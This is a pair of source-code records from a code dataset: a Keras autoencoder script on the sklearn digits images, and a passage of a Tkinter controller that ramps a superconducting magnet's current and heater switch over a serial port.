{"seq_id":"22385132180","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Dec 6 07:48:31 2020\r\n\r\n@author: rejid4996\r\n\"\"\"\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.preprocessing import normalize\r\nfrom sklearn import datasets\r\nfrom IPython.display import SVG\r\nfrom keras.utils.vis_utils import model_to_dot\r\nfrom keras.layers import Input, Dense\r\nfrom keras.models import Model\r\n\r\ndata = datasets.load_digits()\r\n\r\nX_data = data.images\r\ny_data = data.target\r\n\r\nX_data = X_data.reshape(X_data.shape[0], 64)\r\nX_data.max()\r\n\r\n# scale data instances into the interval [0,1]\r\nX_data = X_data / 16.\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X_data, y_data, test_size = 0.3, random_state = 777)\r\n\r\nprint(X_train.shape)\r\nprint(X_test.shape)\r\nprint(y_train.shape)\r\nprint(y_test.shape)\r\n\r\n# simple autoencoder\r\n# define coding dimension\r\ncode_dim = 10\r\n\r\ninputs = Input(shape = (X_train.shape[1], ), name = 'input')\r\ncode = Dense(code_dim, activation='relu', name = 'code')(inputs)\r\n# sigmoid: per-pixel reconstruction in [0,1], matching the binary_crossentropy loss below\r\noutput = Dense(X_train.shape[1], activation = 'sigmoid', name = 'output')(code)\r\n\r\nauto_encoder = Model(inputs = inputs, outputs = output)\r\nauto_encoder.summary()\r\n\r\nSVG(model_to_dot(auto_encoder,show_shapes=True, dpi=73).create(prog='dot', format='svg'))\r\n\r\n# separate encoder/decoder models, needed for encoder.predict / decoder.predict below\r\nencoder = Model(inputs = inputs, outputs=code)\r\n\r\ndecoder_input = Input(shape = (code_dim, ))\r\ndecoder_output = auto_encoder.layers[-1]\r\ndecoder = Model(inputs=decoder_input, outputs = decoder_output(decoder_input))\r\n\r\nauto_encoder.compile(optimizer='adam', loss='binary_crossentropy')\r\n\r\n# training the model\r\nauto_encoder.fit(X_train, X_train, epochs = 300, batch_size = 50, validation_data = (X_test, X_test), verbose = 1)\r\n\r\nencoded = encoder.predict(X_test)\r\ndecoded = decoder.predict(encoded)\r\n\r\nimport pandas as pd\r\npd.DataFrame(encoded[:5])\r\n\r\nplt.figure(figsize = (10,4))\r\nn = 5\r\nfor i in range(n):\r\n # visualizing test data instances\r\n ax = plt.subplot(2, n, i+1)\r\n plt.imshow(X_test[i].reshape(8,8))\r\n plt.gray()\r\n \r\n ax.get_xaxis().set_visible(False)\r\n ax.get_yaxis().set_visible(False)\r\n \r\n # visualizing encode-decoded test data instances\r\n ax = plt.subplot(2, n, i+n+1)\r\n plt.imshow(decoded[i].reshape(8,8))\r\n plt.gray()\r\n \r\n ax.get_xaxis().set_visible(False)\r\n ax.get_yaxis().set_visible(False)\r\nplt.show()\r\n\r\n#%%\r\n## Deep autoencoder\r\n\r\ndef encoder_decoder(code_dim = 10):\r\n inputs = Input(shape = (X_train.shape[1],))\r\n code = Dense(50, activation= 'relu')(inputs)\r\n code = Dense(50, activation = 'relu')(code)\r\n code = Dense(code_dim, activation = 'relu')(code)\r\n \r\n outputs = Dense(50, activation = 'relu')(code)\r\n outputs = Dense(50, activation = 'relu')(outputs)\r\n outputs = Dense(X_train.shape[1], activation = 'sigmoid')(outputs)\r\n \r\n auto_encoder = Model(inputs = inputs, outputs = outputs)\r\n auto_encoder.compile(optimizer = 'adam', loss = 'binary_crossentropy')\r\n \r\n return 
auto_encoder\r\n\r\nauto_encoder = encoder_decoder()\r\n\r\nauto_encoder.fit(X_train, X_train, epochs = 1000, batch_size = 50, validation_data = (X_test, X_test), verbose = 1)\r\ndecoded = auto_encoder.predict(X_test)\r\n\r\nplt.figure(figsize = (10,4))\r\nn = 5\r\nfor i in range(n):\r\n # visualizing test data instances\r\n ax = plt.subplot(2, n, i+1)\r\n plt.imshow(X_test[i].reshape(8,8))\r\n plt.gray()\r\n \r\n ax.get_xaxis().set_visible(False)\r\n ax.get_yaxis().set_visible(False)\r\n \r\n # visualizing encode-decoded test data instances\r\n ax = plt.subplot(2, n, i+n+1)\r\n plt.imshow(decoded[i].reshape(8,8))\r\n plt.gray()\r\n \r\n ax.get_xaxis().set_visible(False)\r\n ax.get_yaxis().set_visible(False)\r\nplt.show()","repo_name":"dreji18/Autoencoders","sub_path":"learning.py","file_name":"learning.py","file_ext":"py","file_size_in_byte":3710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"74606988327","text":"#Author: Richard Mattish\r\n#Last Updated: 02/27/2023\r\n\r\nimport os\r\nfrom tkinter import *\r\nfrom tkinter import filedialog\r\nimport platform\r\nimport matplotlib\r\nmatplotlib.use('TkAgg')\r\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\r\nfrom matplotlib.figure import Figure\r\nimport matplotlib.animation as animation\r\nimport time\r\nimport webbrowser\r\nimport serial\r\nimport re\r\nimport datetime\r\n\r\n\r\n#Defines location of the Desktop as well as font and text size for use in the software\r\ndesktop = os.path.expanduser(\"~\\Desktop\")\r\nfont1 = ('Helvetica', 18)\r\nfont2 = ('Helvetica', 16)\r\nfont3 = ('Helvetica', 14)\r\nfont4 = ('Helvetica', 12)\r\ntextSize = 20\r\n\r\ntoday = datetime.date.today().strftime(\"%m-%d-%y\")\r\nnow = datetime.datetime.now().strftime(\"%H%M\")\r\nlogPath = 'C:/Users/CUEBIT/Documents/status_logs/magnet_ramp_logs/'\r\nlogName = f'Log {today} {now}.txt'\r\n\r\nnow = datetime.datetime.now().strftime(\"%H:%M:%S\")\r\nlog = open(logPath+logName,'w')\r\nlog.write(f'Date: {today}\\n')\r\nlog.write(f'Log started at {now}\\n\\n')\r\nlog.close()\r\n\r\ndef startProgram(root=None):\r\n instance = rampController()\r\n instance.startGui(root)\r\n\r\nclass rampController:\r\n def __init__(self): \r\n self.port = None\r\n self.stage1Temp = None\r\n self.stage2Temp = None\r\n self.magnetATemp = None\r\n self.magnetBTemp = None\r\n self.switchTemp = None\r\n self.sqlFile = None\r\n self.state = None\r\n self.interlock = False\r\n self.status = None\r\n self.ser = None\r\n self.process = None\r\n self.switch = False\r\n\r\n self.initialTime = None\r\n self.time_array = []\r\n self.current_array = []\r\n\r\n self.rate1 = None\r\n self.rate2 = None\r\n self.rate3 = None\r\n self.rate4 = None\r\n self.set1 = None\r\n self.set2 = None\r\n self.set3 = None\r\n self.set4 = None\r\n\r\n self.t1 = None\r\n\r\n\r\n #Loads the saved settings (serial port, data file, and the ramp rates/setpoints) from the variables file, and creates the file if none exists\r\n try:\r\n f = open('variables', 'r')\r\n variables = f.readlines()\r\n self.port = str(variables[0].split('=')[1]).strip()\r\n self.sqlFile = str(variables[1].split('=')[1]).strip()\r\n self.rate1 = float(variables[2].split(',')[0].split('=')[1])\r\n self.set1 = float(variables[2].split(',')[1].split('=')[1])\r\n self.rate2 = float(variables[3].split(',')[0].split('=')[1])\r\n self.set2 = float(variables[3].split(',')[1].split('=')[1])\r\n self.rate3 = float(variables[4].split(',')[0].split('=')[1])\r\n self.set3 = float(variables[4].split(',')[1].split('=')[1])\r\n 
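# Each (rateN, setN) pair is one leg of the ramp: a rate in A/s and its target current in A.\r\n 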
self.rate4 = float(variables[5].split(',')[0].split('=')[1])\r\n self.set4 = float(variables[5].split(',')[1].split('=')[1])\r\n\r\n if self.set4 > 108.1:\r\n self.log_entry(f\"Error with max current {self.set4}, reducing to 108.1!\")\r\n self.set4 = 108.1\r\n\r\n self.log_entry('Getting variables from variables file')\r\n \r\n\r\n except:\r\n self.port = 'COM6'\r\n self.sqlFile = 'data'\r\n self.rate1 = 0.292\r\n self.set1 = 36\r\n self.rate2 = 0.219\r\n self.set2 = 72\r\n self.rate3 = 0.123\r\n self.set3 = 90\r\n self.rate4 = 0.052\r\n self.set4 = 108.1\r\n f = open(\"variables\",'w')\r\n f.write(f'port={self.port}\\nsqlFile={self.sqlFile}\\nrate1={self.rate1},set1={self.set1}\\nrate2={self.rate2},set2={self.set2}\\\r\n \\nrate3={self.rate3},set3={self.set3}\\nrate4={self.rate4},set4={self.set4}')\r\n f.close()\r\n\r\n self.log_entry('Unsuccessful: Writing new variables file and resetting all variables to default values')\r\n\r\n def get_settings(self):\r\n # Return an array or collection of settings here\r\n # Module can have more than 1 set of settings.\r\n return []\r\n\r\n def get_menus(self):\r\n\r\n # This returns what menus (except for settings) should be made for this\r\n # module. This example adds a \"Misc\" dropdown, with 3 values, and 1 separator\r\n \r\n\r\n _file_menu = module.Menu()\r\n # Define what the button does\r\n _file_menu._options[\"ramp_controller\"] = self.startGui\r\n # Defines order in list (only 1 here though)\r\n _file_menu._opts_order.append(\"ramp_controller\")\r\n # Describes what it does\r\n _file_menu._helps[\"ramp_controller\"] = 'Says I Ran a Thing'\r\n # What you see in the list to click on\r\n _file_menu._labels[\"ramp_controller\"] = \"Ramp controller\"\r\n # What menu to add this to\r\n _file_menu._label = \"File\"\r\n\r\n # Returns an array of menus (only 1 in this case)\r\n return [_file_menu]\r\n\r\n def log_entry(self, text):\r\n now = datetime.datetime.now().strftime(\"%H:%M:%S\")\r\n log = open(logPath+logName, 'a')\r\n log.write(f'{now}\\t{text}\\n\\n')\r\n log.close()\r\n\r\n\r\n def start_ramp(self, dir): \r\n if not self.interlock:\r\n self.interlock = True\r\n self.time_array = []\r\n self.current_array = []\r\n self.state = 'start'\r\n\r\n self.log_entry(f'state={self.state}')\r\n\r\n if self.ser is None:\r\n try:\r\n self.ser = serial.Serial(self.port, 9600, timeout=3)\r\n except Exception as err:\r\n print(err)\r\n self.interlock = False\r\n helpMessage ='Could not connect to magnet controller. 
Check connection and try again'\r\n\r\n self.log_entry(helpMessage)\r\n\r\n messageVar = Message(self.root, text = helpMessage, font = font2, width = 600) \r\n messageVar.config(bg='firebrick1')\r\n messageVar.place(relx = 0, rely = 1, anchor = SW)\r\n self.root.after(5000, messageVar.destroy)\r\n return\r\n self.initialTime = time.time()\r\n\r\n if dir == 'up':\r\n self.log_entry('Ramp Up Process Started')\r\n\r\n self.process = 'energize'\r\n self.status.destroy()\r\n #Creates Status Box\r\n self.status = Frame(self.root, width = 275, height = 300,background = 'white', highlightbackground = 'black', highlightthickness = 1)\r\n self.status.place(relx = 0.87, rely = 0.4, anchor = CENTER)\r\n #Changes Status Label\r\n statusLabel = Label(self.status, text = 'Status: Energizing B', font = font1, bg = 'white', fg = 'blue')\r\n statusLabel.place(relx=0.5, rely=0.15, anchor = CENTER)\r\n\r\n\r\n #Stage 1 Process\r\n stage1 = Label(self.status, text = 'Stage 1: ', font = font3, bg = 'yellow')\r\n process1= Label(self.status, text = 'Heating Switch', font = font3, bg = 'yellow')\r\n stage1.place(relx=0.35, rely=0.3, anchor = E)\r\n process1.place(relx=0.35, rely=0.3, anchor = W)\r\n\r\n #Stage 2 Process\r\n stage2 = Label(self.status, text = 'Stage 2: ', font = font3, bg = 'white')\r\n process2 = Label(self.status, text = 'Ramping Up', font = font3, bg = 'white')\r\n process2b = Label(self.status, text = 'R = 0.000 A/s', font = font4, bg = 'white')\r\n stage2.place(relx=0.35, rely=0.45, anchor = E)\r\n process2.place(relx=0.35, rely=0.45, anchor = W)\r\n process2b.place(relx=0.35, rely=0.55, anchor=W)\r\n\r\n #Stage 3 Process\r\n stage3 = Label(self.status, text = 'Stage 3: ', font = font3, bg = 'white')\r\n process3 = Label(self.status, text = 'Cooling Switch', font = font3, bg = 'white')\r\n stage3.place(relx=0.35, rely=0.65, anchor = E)\r\n process3.place(relx=0.35, rely=0.65, anchor = W)\r\n\r\n #Stage 4 Process\r\n stage4 = Label(self.status, text = 'Stage 4: ', font = font3, bg = 'white')\r\n process4 = Label(self.status, text = 'Ramping Down', font = font3, bg = 'white')\r\n process4b = Label(self.status, text = 'R = 0.5 A/s', font = font4, bg = 'white')\r\n stage4.place(relx=0.35, rely=0.8, anchor = E)\r\n process4.place(relx=0.35, rely=0.8, anchor = W)\r\n process4b.place(relx=0.35, rely=0.9, anchor=W)\r\n\r\n self.ramp_up()\r\n\r\n elif dir == 'down':\r\n self.log_entry('Ramp Down Process Started')\r\n self.process = 'de-energize'\r\n self.status.destroy()\r\n #Creates Status Box\r\n self.status = Frame(self.root, width = 275, height = 300,background = 'white', highlightbackground = 'black', highlightthickness = 1)\r\n self.status.place(relx = 0.87, rely = 0.4, anchor = CENTER)\r\n #Changes Status Label\r\n statusLabel = Label(self.status, text = 'Status: De-energizing B', font = font1, bg = 'white', fg = 'blue')\r\n statusLabel.place(relx=0.5, rely=0.15, anchor = CENTER)\r\n\r\n\r\n #Stage 1 Process\r\n stage1 = Label(self.status, text = 'Stage 1: ', font = font3, bg = 'yellow')\r\n process1 = Label(self.status, text = 'Ramping Up', font = font3, bg = 'yellow')\r\n process1b = Label(self.status, text = 'R = 0.5 A/s', font = font4, bg = 'yellow')\r\n stage1.place(relx=0.35, rely=0.3, anchor = E)\r\n process1.place(relx=0.35, rely=0.3, anchor = W)\r\n process1b.place(relx=0.35, rely=0.4, anchor = W)\r\n\r\n #Stage 2 Process\r\n stage2 = Label(self.status, text = 'Stage 2: ', font = font3, bg = 'white')\r\n process2 = Label(self.status, text = 'Heating Switch', font = font3, bg = 
'white')\r\n stage2.place(relx=0.35, rely=0.5, anchor = E)\r\n process2.place(relx=0.35, rely=0.5, anchor = W)\r\n\r\n #Stage 3 Process\r\n stage3 = Label(self.status, text = 'Stage 3: ', font = font3, bg = 'white')\r\n process3 = Label(self.status, text = 'Ramping Down', font = font3, bg = 'white')\r\n process3b = Label(self.status, text = 'R = -0.1 A/s', font = font4, bg = 'white')\r\n stage3.place(relx=0.35, rely=0.65, anchor = E)\r\n process3.place(relx=0.35, rely=0.65, anchor = W)\r\n process3b.place(relx=0.35, rely=0.75, anchor=W)\r\n\r\n #Stage 4 Process\r\n stage4 = Label(self.status, text = 'Stage 4: ', font = font3, bg = 'white')\r\n process4 = Label(self.status, text = 'Cooling Switch', font = font3, bg = 'white')\r\n stage4.place(relx=0.35, rely=0.85, anchor = E)\r\n process4.place(relx=0.35, rely=0.85, anchor = W)\r\n\r\n self.ramp_down()\r\n else:\r\n helpMessage ='Cannot start another process while the magnet is being ramped' \r\n messageVar = Message(self.root, text = helpMessage, font = font2, width = 600) \r\n messageVar.config(bg='firebrick1')\r\n messageVar.place(relx = 0, rely = 1, anchor = SW)\r\n self.root.after(5000, messageVar.destroy)\r\n\r\n def ramp_up(self):\r\n if self.state == 'abort':\r\n return\r\n \r\n if self.state == 'start':\r\n\r\n # Set the ramp target to set4.\r\n self.ser.write(str.encode(f'SET MID {self.set4/2:.1f}\\n'))\r\n reading = self.ser.readline().decode()\r\n self.ser.write(str.encode(f'SET MAX {self.set4:.1f}\\n'))\r\n reading = self.ser.readline().decode()\r\n\r\n #Turns the heater on to warm up the switch\r\n self.ser.write(str.encode('H1?\\n'))\r\n reading = self.ser.readline().decode()\r\n if re.search('HEATER STATUS: ON', reading) == None:\r\n print(reading)\r\n print('Error: Heater did not turn on')\r\n self.log_entry(f'Error: Heater did not turn on\\n{reading}')\r\n return\r\n self.state = 'warm_up'\r\n self.log_entry(f'state={self.state}')\r\n self.switch = True\r\n \r\n elif self.state == 'warm_up':\r\n self.check_temperature('up')\r\n \r\n elif self.state == 'start_ramp':\r\n #Starts the current ramping upward\r\n self.ser.write(str.encode(f'SR{self.rate1}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate1) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.ser.write(str.encode('R!\\n'))\r\n self.state = 'ramp_1'\r\n self.log_entry(f'state={self.state}')\r\n\r\n #Stage 1 Process\r\n stage1 = Label(self.status, text = 'Stage 1: ', font = font3, bg = 'white')\r\n process1= Label(self.status, text = 'Heating Switch', font = font3, bg = 'white')\r\n stage1.place(relx=0.35, rely=0.3, anchor = E)\r\n process1.place(relx=0.35, rely=0.3, anchor = W)\r\n\r\n #Stage 2 Process\r\n stage2 = Label(self.status, text = 'Stage 2: ', font = font3, bg = 'yellow')\r\n process2 = Label(self.status, text = 'Ramping Up', font = font3, bg = 'yellow')\r\n process2b = Label(self.status, text = f'R = {self.rate1} A/s', font = font4, bg = 'yellow')\r\n stage2.place(relx=0.35, rely=0.45, anchor = E)\r\n process2.place(relx=0.35, rely=0.45, anchor = W)\r\n process2b.place(relx=0.35, rely=0.55, anchor=W)\r\n \r\n elif self.state == 'ramp_1':\r\n self.check_current(self.set1, 'up')\r\n\r\n elif self.state == 
'set_rate_2':\r\n #Lowers the ramp rate to 0.219 A/sec when I=36 A\r\n self.ser.write(str.encode(f'SR{self.rate2}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate2) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.state = 'ramp_2'\r\n self.log_entry(f'state={self.state}')\r\n\r\n process2b = Label(self.status, text = f'R = {self.rate2} A/s', font = font4, bg = 'yellow')\r\n process2b.place(relx=0.35, rely=0.55, anchor=W)\r\n \r\n elif self.state == 'ramp_2':\r\n self.check_current(self.set2, 'up')\r\n\r\n elif self.state == 'set_rate_3':\r\n #Lowers the ramp rate to 0.123 A/sec when I=72 A\r\n self.ser.write(str.encode(f'SR{self.rate3}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate3) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.state = 'ramp_3'\r\n self.log_entry(f'state={self.state}')\r\n\r\n process2b = Label(self.status, text = f'R = {self.rate3} A/s', font = font4, bg = 'yellow')\r\n process2b.place(relx=0.35, rely=0.55, anchor=W)\r\n\r\n elif self.state == 'ramp_3':\r\n self.check_current(self.set3, 'up')\r\n\r\n elif self.state == 'set_rate_4':\r\n #Lowers the ramp rate to 0.052 A/sec when I=90 A\r\n self.ser.write(str.encode(f'SR{self.rate4}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate4) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.state = 'ramp_4'\r\n self.log_entry(f'state={self.state}')\r\n\r\n process2b = Label(self.status, text = f'R = {self.rate4} A/s', font = font4, bg = 'yellow')\r\n process2b.place(relx=0.35, rely=0.55, anchor=W)\r\n\r\n elif self.state == 'ramp_4':\r\n self.check_current(self.set4, 'up')\r\n\r\n elif self.state == 'heat_off':\r\n #Turns the Heater off\r\n self.ser.write(str.encode('H0?\\n'))\r\n reading = self.ser.readline().decode()\r\n if re.search('HEATER STATUS: SWITCHED OFF', reading) == None:\r\n print(reading)\r\n print('Error: Heater did not turn off')\r\n self.log_entry(f'Error: Heater did not turn off\\n{reading}')\r\n self.ser.write(str.encode('H1?\\n'))\r\n self.state = 'cool_down'\r\n self.log_entry(f'state={self.state}')\r\n\r\n #Stage 2 Process\r\n stage2 = Label(self.status, text = 'Stage 2: ', font = font3, bg = 'white')\r\n process2 = Label(self.status, text = 'Ramping Up', font = font3, bg = 'white')\r\n process2b = Label(self.status, text = 'R = 0.000 A/s', font = font4, bg = 'white')\r\n stage2.place(relx=0.35, rely=0.45, anchor = E)\r\n process2.place(relx=0.35, rely=0.45, anchor = W)\r\n process2b.place(relx=0.35, rely=0.55, anchor=W)\r\n\r\n #Stage 3 Process\r\n 
stage3 = Label(self.status, text = 'Stage 3: ', font = font3, bg = 'yellow')\r\n process3 = Label(self.status, text = 'Cooling Switch', font = font3, bg = 'yellow')\r\n stage3.place(relx=0.35, rely=0.65, anchor = E)\r\n process3.place(relx=0.35, rely=0.65, anchor = W)\r\n \r\n elif self.state == 'cool_down':\r\n self.check_temperature('down')\r\n \r\n elif self.state == 'finished':\r\n self.switch = False\r\n #Sets the ramp rate\r\n self.ser.write(str.encode('SR0.5?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-0.5) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0\\n'))\r\n self.state = 'supply_down'\r\n self.log_entry(f'state={self.state}')\r\n\r\n #Stage 3 Process\r\n stage3 = Label(self.status, text = 'Stage 3: ', font = font3, bg = 'white')\r\n process3 = Label(self.status, text = 'Cooling Switch', font = font3, bg = 'white')\r\n stage3.place(relx=0.35, rely=0.65, anchor = E)\r\n process3.place(relx=0.35, rely=0.65, anchor = W)\r\n\r\n\r\n #Stage 4 Process\r\n stage4 = Label(self.status, text = 'Stage 4: ', font = font3, bg = 'yellow')\r\n process4 = Label(self.status, text = 'Ramping Down', font = font3, bg = 'yellow')\r\n process4b = Label(self.status, text = 'R = -0.5 A/s', font = font4, bg = 'yellow')\r\n stage4.place(relx=0.35, rely=0.8, anchor = E)\r\n process4.place(relx=0.35, rely=0.8, anchor = W)\r\n process4b.place(relx=0.35, rely=0.9, anchor=W)\r\n \r\n elif self.state == 'supply_down':\r\n self.check_current(0, 'down')\r\n\r\n elif self.state == 'done':\r\n self.create_blank_status()\r\n\r\n self.interlock = False\r\n return\r\n \r\n self.root.after(500, lambda: self.ramp_up())\r\n\r\n\r\n def ramp_down(self):\r\n if self.state == 'abort':\r\n return\r\n\r\n if self.state == 'start':\r\n #Starts the current ramping upward\r\n self.ser.write(str.encode('SR0.5?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-0.5) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.ser.write(str.encode('R!\\n'))\r\n self.state = 'ramp_up'\r\n self.log_entry(f'state={self.state}')\r\n\r\n elif self.state == 'ramp_up':\r\n self.check_current(self.set4, 'up')\r\n \r\n elif self.state == 'heat_on':\r\n #Turns the heater on to warm up the switch\r\n self.ser.write(str.encode('H1?\\n'))\r\n reading = self.ser.readline().decode()\r\n print(reading)\r\n if re.search('HEATER STATUS: ON', reading) == None:\r\n print(reading)\r\n print('Error: Heater did not turn on')\r\n self.log_entry(f'Error: Heater did not turn on\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.state = 'warm_up'\r\n self.log_entry(f'state={self.state}')\r\n self.switch = True\r\n\r\n #Stage 1 Process\r\n stage1 = Label(self.status, text = 'Stage 1: ', font = font3, bg = 'white')\r\n process1 = Label(self.status, text = 'Ramping Up', font = font3, bg = 'white')\r\n process1b = Label(self.status, text = 'R = 0.0 A/s', font = font4, bg = 'white')\r\n 
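#Each ramp state above repeats the same sequence: send SR<rate>?, read the reply,
#pull the number out of 'RAMP RATE: ... A/SEC', and compare it against a 0.05 A/s
#tolerance. A minimal sketch of that pattern factored into one helper;
#set_and_verify_rate is a hypothetical refactor that mirrors the inline parsing,
#not part of the original class.
import re

def set_and_verify_rate(ser, rate, tolerance=0.05):
    ser.write(str.encode(f'SR{rate}?\n'))
    reading = ser.readline().decode()
    match = re.search(r'RAMP RATE:\s*([0-9.]+)\s*A/SEC', reading)
    if match is None or abs(float(match.group(1)) - rate) >= tolerance:
        return False, reading  #caller can log the raw reply and ramp down
    return True, reading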
stage1.place(relx=0.35, rely=0.3, anchor = E)\r\n process1.place(relx=0.35, rely=0.3, anchor = W)\r\n process1b.place(relx=0.35, rely=0.4, anchor = W)\r\n\r\n #Stage 2 Process\r\n stage2 = Label(self.status, text = 'Stage 2: ', font = font3, bg = 'yellow')\r\n process2 = Label(self.status, text = 'Heating Switch', font = font3, bg = 'yellow')\r\n stage2.place(relx=0.35, rely=0.5, anchor = E)\r\n process2.place(relx=0.35, rely=0.5, anchor = W)\r\n\r\n elif self.state == 'warm_up':\r\n self.check_temperature('up')\r\n\r\n elif self.state == 'start_ramp':\r\n #Sets the ramp rate for the downward ramp cycle to rate4\r\n self.ser.write(str.encode(f'SR{self.rate4}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate4) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.state = 'ramp_1'\r\n self.log_entry(f'state={self.state}')\r\n #Ramps the magnet current down\r\n self.ser.write(str.encode('R0\\n'))\r\n\r\n #Stage 2 Process\r\n stage2 = Label(self.status, text = 'Stage 2: ', font = font3, bg = 'white')\r\n process2 = Label(self.status, text = 'Heating Switch', font = font3, bg = 'white')\r\n stage2.place(relx=0.35, rely=0.5, anchor = E)\r\n process2.place(relx=0.35, rely=0.5, anchor = W)\r\n\r\n #Stage 3 Process\r\n stage3 = Label(self.status, text = 'Stage 3: ', font = font3, bg = 'yellow')\r\n process3 = Label(self.status, text = 'Ramping Down', font = font3, bg = 'yellow')\r\n process3b = Label(self.status, text = f'R = -{self.rate4} A/s', font = font4, bg = 'yellow')\r\n stage3.place(relx=0.35, rely=0.65, anchor = E)\r\n process3.place(relx=0.35, rely=0.65, anchor = W)\r\n process3b.place(relx=0.35, rely=0.75, anchor=W)\r\n \r\n elif self.state == 'ramp_1':\r\n self.check_current(self.set3, 'down')\r\n\r\n elif self.state == 'set_rate_2':\r\n #Raises the ramp rate to rate3 when I=set3\r\n self.ser.write(str.encode(f'SR{self.rate3}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate3) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.state = 'ramp_2'\r\n self.log_entry(f'state={self.state}')\r\n\r\n process3b = Label(self.status, text = f'R = -{self.rate3} A/s', font = font4, bg = 'yellow')\r\n process3b.place(relx=0.35, rely=0.75, anchor=W)\r\n\r\n elif self.state == 'ramp_2':\r\n self.check_current(self.set2, 'down')\r\n\r\n elif self.state == 'set_rate_3':\r\n #Raises the ramp rate to rate2 when I=set2\r\n self.ser.write(str.encode(f'SR{self.rate2}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate2) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.state = 'ramp_3'\r\n self.log_entry(f'state={self.state}')\r\n\r\n process3b = Label(self.status, text = f'R = -{self.rate2} A/s', font = font4, bg 
= 'yellow')\r\n process3b.place(relx=0.35, rely=0.75, anchor=W)\r\n\r\n elif self.state == 'ramp_3':\r\n self.check_current(self.set1, 'down')\r\n\r\n elif self.state == 'set_rate_4':\r\n #Raises the ramp rate to rate1 when I=set1\r\n self.ser.write(str.encode(f'SR{self.rate1}?\\n'))\r\n reading = self.ser.readline().decode()\r\n start = re.search('RAMP RATE: ', reading).span()[1] + 1\r\n end = re.search(' A/SEC', reading).span()[0] - 1\r\n rate = float(reading[start:end])\r\n if abs(rate-self.rate1) >= 0.05:\r\n print(reading)\r\n print('Error: Rate not set correctly')\r\n self.log_entry(f'Error: Rate not set correctly\\n{reading}')\r\n self.ser.write(str.encode('R0?\\n'))\r\n self.check_current(0, 'down')\r\n return\r\n self.state = 'ramp_down'\r\n self.log_entry(f'state={self.state}')\r\n\r\n process3b = Label(self.status, text = f'R = -{self.rate1} A/s', font = font4, bg = 'yellow')\r\n process3b.place(relx=0.35, rely=0.75, anchor=W)\r\n \r\n elif self.state == 'ramp_down':\r\n self.check_current(0, 'down')\r\n\r\n elif self.state == 'heat_off':\r\n #Turns the Heater off\r\n self.ser.write(str.encode('H0?\\n'))\r\n reading = self.ser.readline().decode()\r\n if re.search('HEATER STATUS: OFF', reading) == None:\r\n print(reading)\r\n print('Error: Heater did not turn off')\r\n 